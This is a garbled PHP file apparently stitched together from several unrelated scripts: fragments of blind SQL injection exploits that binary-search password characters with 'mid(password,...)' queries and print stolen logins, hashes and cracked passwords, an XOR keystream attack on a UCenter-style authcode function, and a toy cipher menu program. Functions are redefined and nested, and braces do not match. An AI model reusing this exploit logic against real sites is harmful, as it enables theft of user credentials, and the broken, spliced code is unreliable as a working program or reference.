function blind($sn, $fmin, $fmax)
{
if ($fmax - $fmin < 5) {
if (crack($fmin, $fmax, $sn) == 0) {
print "\n\rEXPLOIT FAILED...";
credits();
}
return;
}
$compare = intval($fmin + ($fmax - $fmin) / 2);
$crcheck = ">" . $compare;
if (check($crcheck, $sn) == 1) {
blind($sn, $compare, $fmax);
} else {
blind($sn, $fmin, $compare + 1);
}
}
echo mt_rand() . "\n";
echo "plaintext1 is : " . $plaintext1 . "\n";
echo "plaintext2 is : " . $plaintext2 . "\n";
$cliper1 = base64_decode(substr(authcode($plaintext1, 'ENCHODE', UC_KEY), 0));
echo "cliper1 is " . hex($cliper1) . "\n\n";
$cliper2 = base64_decode(substr(authcode($plaintext2, 'ENCHODE', UC_KEY), 0));
echo "cliper2 is " . hex($cliper2) . "\n\n";
function hex($string)
{
$result = '';
for ($i = 0; $i < strlen($string); $i++) {
$result .= "\\x" . ord($string[$i]);
}
return $result;
}
echo "crack result is : " . crack($plaintext1, $cliper1, $cliper2);
function crack($plain, $cipher_p, $cipher_t)
{
$target = '';
$len = strlen($plain);
$tmp_p = substr($cipher_p, 26);
echo hex($tmp_p) . "\n";
$tmp_t = substr($cipher_t, 26);
echo hex($tmp_t) . "\n";
for ($i = 0; $i < $len; $i++) {
$target .= chr(ord($plain[$i]) ^ ord($tmp_p[$i]) ^ ord($tmp_t[$i]));
}
return $target;
}
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0)
{
function crack($i)
{
global $hashtable;
$sql = "mid(password,{$i},1)>0x" . bin2hex('8');
if (sqlject($sql)) {
$a = 8;
$b = 15;
} else {
$a = 0;
$b = 8;
}
for ($tmp = $a; $tmp <= $b; $tmp++) {
$sql = "mid(password,{$i},1)=0x" . bin2hex($hashtable[$tmp]);
if (sqlject($sql)) {
return $hashtable[$tmp];
}
}
crack($i);
}
print "[*] Login:\t";
$login = blind("email", $i);
if ($login == "") {
if ($i == 0) {
print "\r[*] Attack failed.\n\n";
} else {
print "\r[*] Attack failed (if you crack a hash, use -admin param).\n\n";
}
break;
}
print "\n[*] Hash:\t";
$passwd = blind("mot_passe", $i);
print "\n";
$md5 = strtolower($passwd);
for ($a = 0; $a < sizeof($md5loc); $a++) {
$r = crack($md5loc[$a][0], $md5loc[$a][1], $md5loc[$a][2]);
if ($r) {
print "[*] Password:\t{$r}\n";
break;
}
}
if (!$r) {
print "[*] Can't find the hash on the net, sorry.\n";
} else {
attack($login, $r);
die;
}
}
}
function blind($field, $i = 0)
{
{
global $cipher;
echo 'Enter an encrypted message: ';
$ciphertext = fgets(STDIN);
$key = $cipher->crack($ciphertext);
echo "\n" . $cipher->decrypt($ciphertext, $key);
}
/*
|---------------------------------------------------------------------
| Main Loop
|---------------------------------------------------------------------
*/
while ($continue) {
echo "Enter an option:\n1. Encrypt\n2. Crack\n3. Exit\n";
$selection = fgets(STDIN);
switch ($selection) {
case 1:
encrypt();
break;
case 2:
crack();
break;
case 3:
$continue = false;
echo 'Goodbye!';
break;
default:
echo "I'm sorry, please select a valid option.\n";
break;
}
}
function blind($param, $sn, $fmin, $fmax)
{
if ($fmax - $fmin < 5) {
return crack($param, $fmin, $fmax, $sn);
}
$compare = intval($fmin + ($fmax - $fmin) / 2);
$crcheck = ">" . $compare;
if (check(makeExpl($param, $crcheck, $sn)) == 1) {
return blind($param, $sn, $compare, $fmax);
} else {
return blind($param, $sn, $fmin, $compare + 1);
}
}